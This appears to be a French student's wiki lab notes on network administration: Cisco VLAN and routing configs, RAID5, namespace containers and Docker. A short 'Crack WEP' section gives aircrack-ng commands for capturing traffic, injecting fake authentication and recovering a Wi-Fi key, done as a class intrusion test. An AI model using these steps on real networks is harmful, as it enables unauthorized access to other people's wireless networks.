  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Suite à une erreur de manipulation le /var est mort&lt;br /&gt;
&lt;br /&gt;
Pour réaliser la suite du TP j'ai recrée une VM Dionysos2, même addresse IP.&lt;br /&gt;
&lt;br /&gt;
Il faut donc éteindre la VM Dionysos pour éviter tout problème&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
=== Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
==== Le routage de sites (IPv4) ====&lt;br /&gt;
&lt;br /&gt;
==== Le routage de site (IPv6)&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49061</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49061"/>
				<updated>2018-12-21T09:50:09Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* TP PRA - Mise en place du routeur Catalyst 3650 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
